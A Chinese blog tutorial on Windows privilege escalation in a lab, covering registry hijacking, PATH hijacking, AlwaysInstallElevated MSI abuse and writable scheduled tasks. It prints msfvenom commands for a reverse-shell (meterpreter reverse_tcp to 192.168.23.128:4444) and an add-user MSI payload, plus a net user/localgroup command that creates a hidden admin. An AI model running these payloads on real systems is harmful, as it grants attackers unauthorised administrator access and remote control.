Windows系统提权简单总结

已于 2022-08-09 12:12:11 修改
阅读量1.7k 收藏 3
点赞数 1
文章标签: web安全
于 2022-07-13 21:42:19 首次发布
Aiwin
本文链接:https://blog.csdn.net/weixin_53090346/article/details/125773061
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

目录

前言

一、简单注册表劫持

二、简单的劫持示例

三、环境变量PATH提权

四、环境变量PATH提权例子

五、MSI文件提权

六、MSI提权例子

七、计划任务提权

八、计划任务提权例子

总结

前言

提示:这里可以添加本文要记录的大概内容:

Windows系统的注册表,存储了系统和应用程序的设置信息,是一个重要的数据库。相对于定时任务进行恶意程序的触发,使用注册表劫持的方式也能进行恶意程序的触发。

提示:以下是本篇文章正文内容,下面案例可供参考

一、简单注册表劫持

注册表劫持是指,更改注册表中的某些配置,使其能够带动恶意程序一并触发。比如windows系统打开.txt的文件,它总是能够选择notepad.exe,因为注册表中存在相应的配置。

 

@符号定义了从windows\system32\notepad.exe中获取字符串资源 

-469是资源ID为469的字符串资源,即notepad.exe这个资源。

二、简单的劫持示例

1,劫持windows的notepad.exe打开的.txt。

2,以mstsc远程桌面当作恶意程序。

这里的%1是notepad.exe的一个参数,随后在电脑中打开一个.txt文件,会随即执行scvhost.cmd文件,带动mstsc.txt恶意程序的触发。

三、环境变量PATH提权

环境变量PATH提权主要依赖系统中存在的PATH环境变量配置错误进行提权,比如说某些执行程序的方法即使用cmd或命令执行的命令仅依赖PATH环境变量来确定未提供程序路径时搜索程序的位置。就是比如说,当在cmd中执行ipconfig,Windows系统会在当前目录搜索ipconfig.exe,若没找到,则根据PATH环境变量目录依次寻找。假若有一个环境变量配置在系统环境变量配置前面,那么会先寻找此路径,寻找相同名称的exe程序并优先执行。

四、环境变量PATH提权例子

1,先查看系统的环境变量配置

2,系统环境变量PATH中存在 C:\inetpub位于%SystemROOT%\system32前面,那么执行类似ipconfig此类命令行命令会现在此路径寻找ipconfig.exe程序,后在system32目录下寻找。

3,msf生成木马并监听

 4,将ipconfig.exe生成的木马程序上传到C:\inetpub目录下

 5,命令行执行ipconfig命令,查看是否有Shell返回

 6,成功执行了木马返回了shell

五、MSI文件提权

Windows Installer是专门用来管理和配置软件服务的工具,包括管理软件的安装、管理软件组件的添加和删除、监视文件的复原以及使用回滚技术维护基本的灾难恢复,若Windows Installer组件永远以高权限开启了高特权进行安装配置,将导致非特权用户可以使用恶意的msi文件进行提权。

六、MSI提权例子

1,查询WindowsInstaller组件是否配置了永远以高特权进行安装

注册表键值为1,开启了配置

 2,利用msf生成恶意的MSI文件

msfvenom -p windows/adduser USER=a$ PASS=123456aA. -f msi -o exp.msi 

上传到靶机中,使用msiexec运行即可添加用户

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.23.128 lport=4444 -f msi -o exp.msi

生成恶意的msi马,上传运行也可得到System权限

3,运行MSI文件后,查看得到的权限用户

得到System权限

 七、计划任务提权

Windows中用at和schtasks命令添加计划任务,at命令默认以System权限运行,目前已被Windows系统弃用。但是对schtasks命令权限配置不当,也能被利用进行提权,前提是满足两点,计划任务以高权限运行,运行的计划任务如.bat结尾等可以被低权限用户编辑。

八、计划任务提权例子

1,查看靶机中是否存在可利用的计划任务,太多,此处直接利用restart创建的1.bat

 

2,查看计划任务启动的1.bat是否可修改,并修改任务添加用户

net user a 123456aA. /add & net localgroup administrators a /add

3,等待计划任务执行后,主机重启,添加用户成功,用户属于管理组

 

总结

相比于定时任务,劫持注册表触发恶意程序会比较苛刻,需要由电脑管理员手动触发,同时先前必须知道管理员会打开那些文件,可控性差。对于注册表劫持的防御其实也比较简单,对注册表的一些默认配置等进行更改监控即可。PATH环境变量进行提权主要源于环境变量的错误配置,同时也需要执行事先已知要执行的系统命令。MSI提权与计划任务提权都源于管理员的配置疏忽,将Windows Installer组件永远配置了高特权以及将能被低权限修改的计划任务配置了高特权执行。总的来说,以上的几种提权,是当漏洞提权使用不了的时候,可以尝试的不错的方式。

M03-Aiwin
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
注册表劫持sechx
10-18
sechx提权利器,直接导入即可,成功率高 珍藏好久了,拿出来分享
生成木马反弹和简单Windows提权
BRMTSW的博客
03-01 601
生成木马反弹和简单Windows提权
权限提升-Windows权限提升篇&溢出漏洞&土豆家族&通杀全系&补丁对比&EXP筛选
siu~
03-23 979
1、Web到Win-系统提权-土豆家族 2、Web到Win-系统提权-人工操作
Windows提权姿势总结
qq_53138792的博客
04-02 5039
1、ByPassUAC ByPassUAC 的方法一般有利用系统白名单程序、COM接口以及利用 Windows 自身漏洞等方式。 常见工具有 PowerShell 版的 Yamabiko 和需要自己编译的 C 语言版的 UACME 等,UACME 目前已经支持了72 种 ByPassUAC 的方法。 UACME 项目地址: https://github.com/hfiref0x/UACME.git 克隆 UACME 项目到本地后,使用 VS2019 进行编译,然后运行即可。 例如以下命令,表示使
Kotlin 实现动态获权的两种方式?
yyxhzdm的博客
09-21 798
一、自定义 1.在项目的BaseActivity添加代码 /** * 动态获权 * */ /** * 动态获权请求值 */ private var REQUEST_CODE_PERMISSION = 0x00099 protected val TAG = this.javaClass.simpleName /** * 请求权限 * 动态获权 * @param permissions 请求的权限 * @param requestCode 请求权限的请求码 */ open fun re
Windows常见的几种提权方法
热门推荐
hackzkaq的博客
05-20 1万+
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全—杰斯 提权,提高自己在服务器中的权限,主要针对网站渗透过程中,当渗透某一网站时,通过各种漏洞提升WEBSHELL权限以夺得该服务器权限,通常提权是把普通用户的权限提升到管理员权限或者系统权限 在渗透测试过程中,拿到一个webshell之后,一般来说,我们的权限都是目标服务器中间件的权限。 这个时候就需要利用各种漏洞来提升自己的权限,从而能够获得对目标服务器的控制。 1.补丁查询法 简介 补丁一般都是为了应对计算机中存在的漏洞,为了更好的优化计算机的
系统提权——Windows系统提权
JulySec的博客
02-13 1792
系统提权——Windows系统提权。 1、使用系统自带命令提权; 2、进程注入; 3、令牌窃取; 4、DLL劫持; 5、不安全的服务配置。 UAC机制的绕过
Windows权限提升
Williamanddog的博客
02-07 2279
kiwi_cmd可以使用mimikatz的全部功能,比如kiwi_cmd sekurlsa::logonpasswords获取明文密码。run post/multi/recon/local_exploit_suggester查询哪些提权exp可以用。systeminfo查看系统补丁:一般的,如果网站安全做好的的情况下,会有几百个补丁。tasklist 查看当前运行的进程,是否有av,可利用的第三方的服务提权等。systeminfo 查看服务器信息及相应的补丁,可找相应的补丁提权
【内网安全】——Windows提权姿势
Demo不是emo的博客
02-06 5072
超详细的windows提权姿势汇总
Windows最最最常见的几种提权方法
2301_80115097的博客
12-12 514
Windows SMB 服务器特权提升漏洞(CVE漏洞编号:CVE-2016-3225)当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞,成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。提权,提高自己在服务器中的权限,主要针对网站渗透过程中,当渗透某一网站时,通过各种漏洞提升WEBSHELL权限以夺得该服务器权限,通常提权是把普通用户的权限提升到管理员权限或者系统权限。要利用此漏洞,攻击者首先必须登录到系统
Windows提权方法大全汇总(值的收藏)
MachineGunJoe666
08-24 4543
一、无引号服务路径 ( Trusted Service Paths ) 先说实用度,比较被动,而且比较看脸。 Windows下服务的权限通常是SYSTEM。如果我们能够替换服务的启动程序为我们的恶意程序(如反弹shell),即相当于获得了SYSTEM权限,达到了提权的目的。 无引号服务路径有可能会导致这种情况的发生。 所谓无引号服务路径,就是服务启动程序的路径中包含了空格且未被引号包含起来。比如这样 C:\Program Files\floder1\service.exe 因为空格的存在,Windows.
windows&linux;提权总结
04-24
windows&linux;提权总结,套路,套路,套路,套路套路,套路,套路,。
windows server 2003 系统提权
08-09
windows server 2003 系统提权 课程名称:《系统提权》 【要求】 对Windows Server2003操作系统MS08_067、MS03_026漏洞进行提权渗透测试; 对MS03_026漏洞开启远程桌面服务; 操作过程可自由发挥; 概念越详细越好...
Windows,Linux等系统提权工具
01-20
系统提权
windows账户提权 API.zip
01-22
windows账户提权 API.zip
windows系统提权工具.zip
12-25
windows7,windows2003等系统提权工具,psexec.exe程序可以实现windows7和2003的提权,whoami可以在win7上查看当前用户,pinjector是一个进程注入工具,procexp是一个手动查杀病毒的工具可以用来找到被进程注入的...
大模型引领未来:探索其在多个领域的深度应用与无限可能【第七章、大模型在科技、网络安全、农业等方面的应用探索】
今晚打老虎的专栏
05-01 770
大型模型在科技、网络安全和农业领域的应用持续演进。在科技中,它们加速了天文学和科学研究的进展。在网络安全领域,大模型提高了网络威胁检测和应对的效率。而在农业中,它们帮助农民做出精准决策,优化产量和质量。这些应用展示了大模型在不同领域的广泛用途,为各行业带来新的发展机遇。
网络安全与密码学--AES加密
weixin_61074128的博客
04-22 1769
1997年 NIST征集AES(Advanced Encryption Standard)2000年选中。AES分组长度为128位,密钥长度为128 192 256位。密钥长度 64位(实际使用56位 其中8位是奇偶校验位)python实现AES加密。分组加密之AES加密算法。DES 1977年被采用。
【网络安全产品】---应用防火墙(WAF)
最新发布
嘿嘿嘿
05-04 469
Web应用防火墙(Web Application FirewallWAF可对网站或者App的业务流量进行恶意特征识别及防护,在对流量清洗和过滤后,将正常、安全的流量返回给服务器,避免网站服务器被恶意入侵导致性能异常等问题,从而保障网站的业务安全和数据安全
windows 提权
08-27
Windows提权是指获取管理员权限或系统级权限的过程。在某些情况下,普通用户需要提升权限以执行某些操作或访问受限资源。 有几种常见的Windows提权方法,包括: 1. 利用已知漏洞:Windows系统中可能存在一些未修补...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

M03-Aiwin

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值